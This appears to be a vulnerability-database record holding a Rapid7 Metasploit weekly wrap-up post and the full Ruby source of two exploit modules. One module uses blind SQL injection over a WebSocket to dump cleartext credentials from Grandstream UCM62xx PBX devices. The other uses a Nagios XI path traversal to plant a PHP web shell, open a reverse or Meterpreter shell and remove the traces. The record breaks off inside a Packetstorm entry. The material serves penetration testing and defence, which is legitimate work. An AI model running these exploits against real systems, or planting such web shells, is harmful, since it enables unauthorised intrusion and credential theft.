DATABASE RESOURCES PRICING ABOUT US

{"id": "RAPID7BLOG:682AF2364002B8852065C1D4694ED089", "vendorId": null, "type": "rapid7blog", "bulletinFamily": "info", "title": "Metasploit Weekly Wrap-Up", "description": "## Nagios XI web shell upload module\n\n\n\nNew this week is a [Nagios Web Shell Upload module](<https://github.com/rapid7/metasploit-framework/pull/16150>) from Rapid7' own [Jake Baines](<https://github.com/jbaines-r7>), which exploits [CVE-2021-37343](<https://attackerkb.com/topics/zxpvqMqOHQ/cve-2021-37343?referrer=blog>). This module builds upon the existing [Nagios XI scanner](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/nagios_xi_scanner.md>) written by [Erik Wynter](<https://github.com/ErikWynter>). Versions of Nagios XI prior to 5.8.5 are vulnerable to a path traversal exploit through an admin-authenticated PHP web shell that results in code execution as the `www-data` user.\n\n## Ignition for Laravel RCE module\n\nCommunity contributor [heyder](<http://https://github.com/heyder>) [added a module](<https://github.com/rapid7/metasploit-framework/pull/16159>) which exploits [CVE-2021-3129](<https://attackerkb.com/topics/KP6wETuZyw/cve-2021-3129?referrer=blog>) in Ignition for Laravel, versions prior to 2.5.2. This module allows for unauthenticated remote code execution due to insecure usage of the PHP functions `file_get_contents()` and `file_put_contents()`.\n\n## New module content (3)\n\n * [Grandstream UCM62xx IP PBX WebSocket Blind SQL Injection Credential Dump](<https://github.com/rapid7/metasploit-framework/pull/16087>) by jbaines-r7, which exploits [CVE-2020-5723](<https://attackerkb.com/topics/RB012Xn6ww/cve-2020-5723?referrer=blog>) \\- A new module has been added which exploits [CVE-2020-5724](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-5724>), a blind SQL injection in GrandStream UCM62xx IP PBX devices prior to firmware version 1.20.22 to dump usernames and passwords from the `users` table as an unauthenticated attacker. Successfully gathered credentials will be stored in Metasploit's credential database for use in further attacks.\n * [Nagios XI Autodiscovery Webshell Upload](<https://github.com/rapid7/metasploit-framework/pull/16150>) by Claroty Team82 and jbaines-r7, which exploits [CVE-2021-37343](<https://attackerkb.com/topics/zxpvqMqOHQ/cve-2021-37343?referrer=blog>) \\- This exploits a path traversal vulnerability in Nagios XI versions below `5.8.5` to achieve authenticated code execution as the `www-data` user.\n * [Unauthenticated remote code execution in Ignition](<https://github.com/rapid7/metasploit-framework/pull/16159>) by Heyder Andrade and ambionics, which exploits [CVE-2021-3129](<https://attackerkb.com/topics/KP6wETuZyw/cve-2021-3129?referrer=blog>) \\- This module exploits a vulnerability in Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents().\n\n## Enhancements and features\n\n * [#16076](<https://github.com/rapid7/metasploit-framework/pull/16076>) from [bcoles](<https://github.com/bcoles>) \\- This change adds the Meterpreter session type to the post/osx/gather/hashdump, hiding a warning when the module is run with a Meterpreter session.\n * [#16117](<https://github.com/rapid7/metasploit-framework/pull/16117>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This makes some Log4Shell updates. It refactors the scanner to reduce duplicate code, and fix a couple of minor bugs.\n * [#16161](<https://github.com/rapid7/metasploit-framework/pull/16161>) from [smashery](<https://github.com/smashery>) \\- This PR updates the user agent strings for HTTP payloads to use the latest user agent strings for Chrome, Edge and Firefox on Windows and MacOS, as well as IPad.\n * [#16170](<https://github.com/rapid7/metasploit-framework/pull/16170>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This change fixes the native_arch functionality on Java and ensures the native architecture is displayed when running `meterpreter > sysinfo` on Java.\n * [#16173](<https://github.com/rapid7/metasploit-framework/pull/16173>) from [AlanFoster](<https://github.com/AlanFoster>) \\- Adds additional `--no-readline` and `--readline` options to msfconsole for configuring the use of Readline suppor.t\n * [#16181](<https://github.com/rapid7/metasploit-framework/pull/16181>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This adds a resource script for extracting the Meterpreter commands from currently open sessions.\n * [#16192](<https://github.com/rapid7/metasploit-framework/pull/16192>) from [zha0gongz1](<https://github.com/zha0gongz1>) \\- The session notifier has been updated to support notifying about new sessions via WeChat using the ServerJang API and servers.\n * [#16195](<https://github.com/rapid7/metasploit-framework/pull/16195>) from [darrenmartyn](<https://github.com/darrenmartyn>) \\- The `hp_dataprotector_cmd_exec.rb` module has been updated to support x64 payloads. This fixes a bug whereby x64 payloads were not supported as the `Arch` value was not set, leading it to default to x86 payloads only.\n\n## Bugs fixed\n\n * [#16174](<https://github.com/rapid7/metasploit-framework/pull/16174>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This change fixes the mode specification on File.read required for ruby 3 on multiple modules.\n * [#16175](<https://github.com/rapid7/metasploit-framework/pull/16175>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This change fixes the loadpath command summary to display the module types in alphabetical order.\n * [#16177](<https://github.com/rapid7/metasploit-framework/pull/16177>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This change fixes the post(test/search) Meterpreter tests on OSX.\n * [#16184](<https://github.com/rapid7/metasploit-framework/pull/16184>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash when running msfconsole on a Windows host in conjunction with the `sessions -u` command.\n * [#16194](<https://github.com/rapid7/metasploit-framework/pull/16194>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a crash when using Metasploit's psexec module with the Command target.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.29...6.1.30](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-02-09T14%3A46%3A38-06%3A00..2022-02-16T23%3A31%3A40-06%3A00%22>)\n * [Full diff 6.1.29...6.1.30](<https://github.com/rapid7/metasploit-framework/compare/6.1.29...6.1.30>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "published": "2022-02-18T21:24:12", "modified": "2022-02-18T21:24:12", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.rapid7.com/2022/02/18/metasploit-wrap-up-149/", "reporter": "Erin Bleiweiss", "references": [], "cvelist": ["CVE-2020-5723", "CVE-2020-5724", "CVE-2021-3129", "CVE-2021-37343"], "immutableFields": [], "lastseen": "2022-02-18T23:35:18", "viewCount": 147, "enchantments": {"backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:5E9429E0-21B2-448F-8137-A7FDE1EA5C48"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0030"]}, {"type": "cve", "idList": ["CVE-2020-5723", "CVE-2020-5724"]}, {"type": "github", "idList": ["GHSA-4QWP-7C67-JMCC"]}, {"type": "githubexploit", "idList": ["272FC334-4DD4-570F-AB53-1BF7758BA869", "472CD5C0-023D-5465-BAD9-83CF49B2139D", "501BA9BB-F145-529E-BFA9-62A94BCB6191", "5E9C0870-F853-5E81-8E8C-A056A9C414DE", "6E0E7058-958F-5D83-9BC3-AC9A1571D8AC", "7407E081-4DB0-50D7-AC00-42DC86BACF6D", "AF827A23-A60A-565F-B2B6-E5038132A33A", "B57BBC1D-AC88-5370-9A63-B487A1331956", "FE9CDF3B-2AEE-5EA8-8B5B-5210E82BF169"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/GRANDSTREAM_UCM62XX_SQL_ACCOUNT_GUESS/", "MSF:EXPLOIT/LINUX/HTTP/NAGIOS_XI_AUTODISCOVERY_WEBSHELL/"]}, {"type": "nessus", "idList": ["NAGIOSXI_5_8_5.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162094", "PACKETSTORM:165978", "PACKETSTORM:165999"]}, {"type": "thn", "idList": ["THN:428850EABCB7BBC35D8D2E5FF4E56616"]}, {"type": "zdt", "idList": ["1337DAY-ID-36079", "1337DAY-ID-37354", "1337DAY-ID-37366"]}]}, "score": {"value": 0.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:5E9429E0-21B2-448F-8137-A7FDE1EA5C48"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0030"]}, {"type": "cve", "idList": ["CVE-2020-5723", "CVE-2020-5724", "CVE-2021-3129", "CVE-2021-37343"]}, {"type": "github", "idList": ["GHSA-4QWP-7C67-JMCC"]}, {"type": "githubexploit", "idList": ["015776ED-F570-51F6-BD7B-6A422942FCBB", "272FC334-4DD4-570F-AB53-1BF7758BA869", "35896337-DA85-5D42-B9FC-4DF2E3EC881E", "472CD5C0-023D-5465-BAD9-83CF49B2139D", "4EE21D54-330E-5291-B612-7D80CD427AB7", "501BA9BB-F145-529E-BFA9-62A94BCB6191", "5E9C0870-F853-5E81-8E8C-A056A9C414DE", "6E0E7058-958F-5D83-9BC3-AC9A1571D8AC", "7407E081-4DB0-50D7-AC00-42DC86BACF6D", "86E0EEED-C430-5343-BCD1-3FF58D995440", "AF827A23-A60A-565F-B2B6-E5038132A33A", "B4031542-31ED-5A0E-934F-8523687B36BF", "B57BBC1D-AC88-5370-9A63-B487A1331956", "DF739DCB-597D-5266-BFD7-DD6EDEB4ABA4", "FE9CDF3B-2AEE-5EA8-8B5B-5210E82BF169"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-GATHER-GRANDSTREAM_UCM62XX_SQL_ACCOUNT_GUESS-", "MSF:EXPLOIT-LINUX-HTTP-NAGIOS_XI_AUTODISCOVERY_WEBSHELL-"]}, {"type": "nessus", "idList": ["NAGIOSXI_5_8_5.NASL"]}, {"type": "osv", "idList": ["OSV:GHSA-4QWP-7C67-JMCC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162094", "PACKETSTORM:165978", "PACKETSTORM:165999"]}, {"type": "thn", "idList": ["THN:428850EABCB7BBC35D8D2E5FF4E56616"]}, {"type": "veracode", "idList": ["VERACODE:28976"]}, {"type": "zdt", "idList": ["1337DAY-ID-36079", "1337DAY-ID-37354", "1337DAY-ID-37366"]}]}, "epss": [{"cve": "CVE-2020-5723", "epss": "0.004880000", "percentile": "0.723680000", "modified": "2023-03-18"}, {"cve": "CVE-2020-5724", "epss": "0.002940000", "percentile": "0.644200000", "modified": "2023-03-18"}, {"cve": "CVE-2021-3129", "epss": "0.974310000", "percentile": "0.998790000", "modified": "2023-03-17"}, {"cve": "CVE-2021-37343", "epss": "0.623800000", "percentile": "0.972160000", "modified": "2023-03-17"}], "vulnersScore": 0.0}, "_state": {"dependencies": 1660004461, "score": 1684013406, "epss": 1679178262}, "_internal": {"score_hash": "e7fbfb5680533a869f6dd3754aa1ade9"}}

{"metasploit": [{"lastseen": "2023-06-06T17:09:19", "description": "This module uses a blind SQL injection (CVE-2020-5724) affecting the Grandstream UCM62xx IP PBX to dump the users table. The injection occurs over a websocket at the websockify endpoint, and specifically occurs when the user requests the challenge (as part of a challenge and response authentication scheme). The injection is blind, but the server response contains a different status code if the query was successful. As such, the attacker can guess the contents of the user database. Most helpfully, the passwords are stored in cleartext within the user table (CVE-2020-5723). This issue was patched in Grandstream UCM62xx IP PBX firmware version 1.20.22.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T14:23:19", "type": "metasploit", "title": "Grandstream UCM62xx IP PBX WebSocket Blind SQL Injection Credential Dump", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5723", "CVE-2020-5724"], "modified": "2022-02-15T16:47:30", "id": "MSF:AUXILIARY-GATHER-GRANDSTREAM_UCM62XX_SQL_ACCOUNT_GUESS-", "href": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Rex::Proto::Http::WebSocket\n include Msf::Auxiliary::Report\n include Msf::Exploit::SQLi\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Grandstream UCM62xx IP PBX WebSocket Blind SQL Injection Credential Dump',\n 'Description' => %q{\n This module uses a blind SQL injection (CVE-2020-5724) affecting the Grandstream UCM62xx\n IP PBX to dump the users table. The injection occurs over a websocket at the websockify\n endpoint, and specifically occurs when the user requests the challenge (as part of a\n challenge and response authentication scheme). The injection is blind, but the server\n response contains a different status code if the query was successful. As such, the\n attacker can guess the contents of the user database. Most helpfully, the passwords are\n stored in cleartext within the user table (CVE-2020-5723).\n\n This issue was patched in Grandstream UCM62xx IP PBX firmware version 1.20.22.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'jbaines-r7' # Vulnerability discovery, original poc, and Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2020-5724' ],\n [ 'CVE', '2020-5723'],\n [ 'URL', 'https://firmware.grandstream.com/Release_Note_UCM6xxx_1.0.20.22.pdf'],\n [ 'URL', 'https://raw.githubusercontent.com/tenable/poc/master/grandstream/ucm62xx/dump_http_user_creds.py']\n ],\n 'DisclosureDate' => '2020-03-30',\n 'DefaultOptions' => {\n 'RPORT' => 8089,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [],\n 'Reliability' => []\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n # Craft the SQL injection into the challenge request\n def create_injection_request(query)\n id = Rex::Text.rand_text_alphanumeric(12)\n req = \"{\\\"type\\\":\\\"request\\\",\\\"message\\\":{\\\"transactionid\\\":\\\"#{id}\\\",\\\"version\\\":\\\"1.0\\\",\\\"action\\\":\\\"challenge\\\",\\\"username\\\":\\\"\"\n req.concat(\"\\' OR \")\n req.concat(query)\n req.concat('--\"}}')\n req\n end\n\n # Retrieve the server's response and pull out the status response. The return value is\n # the server's response value (or 1 on failure).\n def recv_wsframe_status(wsock)\n res = wsock.get_wsframe\n return 1 unless res\n\n begin\n res_json = JSON.parse(res.payload_data)\n rescue JSON::ParserError\n fail_with(Failure::UnexpectedReply, 'Failed to parse the returned JSON response.')\n end\n\n status = res_json.dig('message', 'status')\n return 1 if status.nil?\n\n status\n end\n\n # Extract the version from the cgi endpoint and compare against the\n # known patched version (1.0.20.22)\n def check\n normalized_uri = normalize_uri(target_uri.path, '/cgi')\n print_status(\"Requesting version information from #{normalized_uri}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalized_uri,\n 'vars_post' => { 'action' => 'getInfo' }\n })\n\n return Exploit::CheckCode::Unknown('No response from target!') unless res && (res.code == 200)\n\n body_json = res.get_json_document\n return Exploit::CheckCode::Unknown(\"Got response from target but it didn't contain a JSON body!\") if body_json.empty?\n\n prog_version = body_json.dig('response', 'prog_version')\n return Exploit::CheckCode::Unknown('JSON response obtained from target, but no prog_version field could be found!') if prog_version.nil?\n\n if Rex::Version.new(prog_version) < Rex::Version.new('1.0.20.22')\n return Exploit::CheckCode::Appears(\"The self-reported version is: #{prog_version}\")\n end\n\n Exploit::CheckCode::Safe(\"The self-reported version is: #{prog_version}\")\n end\n\n def run\n sqli = create_sqli(dbms: SQLitei::BooleanBasedBlind) do |payload|\n wsock = connect_ws(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/websockify')\n )\n\n wsock.put_wstext(create_injection_request(payload))\n recv_wsframe_status(wsock) == 0\n\n rescue Rex::Proto::Http::WebSocket::ConnectionError => e\n res = e.http_response\n fail_with(Failure::Unreachable, e.message) if res.nil?\n fail_with(Failure::Unknown, e.message)\n end\n\n users = sqli.dump_table_fields('users', ['user_name', 'user_password'])\n users.each do |user|\n print_status(\"Found the following username and password: #{user[0]} - #{user[1]}\")\n store_valid_credential(user: user[0], private: user[1])\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-24T15:44:43", "description": "This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as `www-data`. The module achieves this by creating an autodiscovery job with an `id` field containing a path traversal to a writable and remotely accessible directory, and `custom_ports` field containing the web shell. A cron file will be created using the chosen path and file name, and the web shell is embedded in the file. After the web shell has been written to the victim, this module will then use the web shell to establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the autodiscovery job is removed as well.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-06T02:21:18", "type": "metasploit", "title": "Nagios XI Autodiscovery Webshell Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37343"], "modified": "2023-04-01T08:58:37", "id": "MSF:EXPLOIT-LINUX-HTTP-NAGIOS_XI_AUTODISCOVERY_WEBSHELL-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::NagiosXi\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Nagios XI Autodiscovery Webshell Upload',\n 'Description' => %q{\n This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343).\n The path traversal allows a remote and authenticated administrator to upload a PHP web shell\n and execute code as `www-data`. The module achieves this by creating an autodiscovery job\n with an `id` field containing a path traversal to a writable and remotely accessible directory,\n and `custom_ports` field containing the web shell. A cron file will be created using the chosen\n path and file name, and the web shell is embedded in the file.\n\n After the web shell has been written to the victim, this module will then use the web shell to\n establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by\n the module, and the autodiscovery job is removed as well.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Claroty Team82', # vulnerability discovery\n 'jbaines-r7' # metasploit module\n ],\n 'References' => [\n ['CVE', '2021-37343'],\n ['URL', 'https://claroty.com/2021/09/21/blog-research-securing-network-management-systems-nagios-xi/']\n ],\n 'DisclosureDate' => '2021-07-15',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_openssl'\n },\n 'Payload' => {\n 'Append' => ' & disown'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'printf' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options [\n OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),\n OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),\n OptInt.new('DEPTH', [true, 'The depth of the path traversal', 10]),\n OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),\n OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])\n ]\n\n @webshell_uri = '/includes/components/highcharts/exporting-server/temp/'\n @webshell_path = '/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/'\n end\n\n # Authenticate and grab the version from the dashboard. Store auth cookies for later user.\n def check\n auth_result, err_msg, @auth_cookies, @version = authenticate(datastore['USERNAME'], datastore['PASSWORD'], false, false, false)\n case auth_result\n when AUTH_RESULTS[:connection_failed]\n return CheckCode::Unknown(err_msg)\n when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]\n return CheckCode::Detected(err_msg)\n when AUTH_RESULTS[:not_nagios_application]\n return CheckCode::Safe(err_msg)\n end\n\n # affected versions are 5.2.0 -> 5.8.4\n if @version < Rex::Version.new('5.8.5') &&\n @version >= Rex::Version.new('5.2.0')\n return CheckCode::Appears(\"Determined using the self-reported version: #{@version.version}\")\n end\n\n CheckCode::Safe(\"Determined using the self-reported version: #{@version.version}\")\n end\n\n # Using the path traversal, upload a php webshell to the remote target\n def drop_webshell\n autodisc_uri = normalize_uri(target_uri.path, '/includes/components/autodiscovery/')\n print_status(\"Attempting to grab a CSRF token from #{autodisc_uri}\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => autodisc_uri,\n 'cookie' => @auth_cookies,\n 'vars_get' => {\n 'mode' => 'newjob'\n }\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res.code == 200\n fail_with(Failure::UnexpectedReply, 'Unexpected HTTP body') unless res.body.include?('<title>New Auto-Discovery Job')\n\n # snag the nsp token from the response\n nsp = get_nsp(res)\n fail_with(Failure::Unknown, 'Failed to obtain the nsp token which is required to upload the web shell') if nsp.blank?\n\n # drop a basic web shell on the server\n webshell_location = normalize_uri(target_uri.path, \"#{@webshell_uri}#{@webshell_name}\")\n print_status(\"Uploading webshell to #{webshell_location}\")\n php_webshell = '<?php if(isset($_GET[\"cmd\"])) { system($_GET[\"cmd\"]); } ?>'\n payload = 'update=1&' \\\n \"job=#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}&\" \\\n \"nsp=#{nsp}&\" \\\n 'address=127.0.0.1%2F0&' \\\n 'frequency=Yearly&' \\\n \"custom_ports=#{php_webshell}&\"\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => autodisc_uri,\n 'cookie' => @auth_cookies,\n 'vars_get' => {\n 'mode' => 'newjob'\n },\n 'data' => payload\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res.code == 302\n\n # Test the web shell installed by echoing a random string and ensure it appears in the res.body\n print_status('Testing if web shell installation was successful')\n rand_data = Rex::Text.rand_text_alphanumeric(16..32)\n res = execute_via_webshell(\"echo #{rand_data}\")\n fail_with(Failure::UnexpectedReply, 'Web shell execution did not appear to succeed.') unless res.body.include?(rand_data)\n print_good(\"Web shell installed at #{webshell_location}\")\n\n # This is a great place to leave a web shell for persistence since it doesn't require auth\n # to touch it. By default, we'll clean this up but the attacker has to option to leave it\n if datastore['DELETE_WEBSHELL']\n register_file_for_cleanup(\"#{@webshell_path}#{@webshell_name}\")\n end\n end\n\n # Successful exploitation creates a new job in the autodiscovery view. This function deletes\n # the job that there is no evidence of exploitation in the UI.\n def cleanup_job\n print_status('Deleting autodiscovery job')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/includes/components/autodiscovery/'),\n 'cookie' => @auth_cookies,\n 'vars_get' => {\n 'mode' => 'deletejob',\n 'job' => \"#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}\"\n }\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res&.code == 302\n end\n\n # Executes commands via the uploaded webshell\n def execute_via_webshell(cmd)\n cmd = Rex::Text.uri_encode(cmd)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"/includes/components/highcharts/exporting-server/temp/#{@webshell_name}?cmd=#{cmd}\")\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res.code == 200\n res\n end\n\n def execute_command(cmd, _opts = {})\n execute_via_webshell(cmd)\n end\n\n def exploit\n # create a randomish web shell name if the user doesn't specify one\n @webshell_name = datastore['WEBSHELL_NAME'] || \"#{Rex::Text.rand_text_alpha(5..12)}.php\"\n unless @auth_cookies.present?\n auth_result, err_msg, @auth_cookies, @version = authenticate(datastore['USERNAME'], datastore['PASSWORD'], false, false, false)\n case auth_result\n when AUTH_RESULTS[:connection_failed]\n return CheckCode::Unknown(err_msg)\n when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]\n return CheckCode::Detected(err_msg)\n when AUTH_RESULTS[:not_nagios_application]\n return CheckCode::Safe(err_msg)\n end\n end\n\n drop_webshell\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n ensure\n cleanup_job\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-02-14T18:01:45", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-14T00:00:00", "type": "packetstorm", "title": "Nagios XI Autodiscovery Shell Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 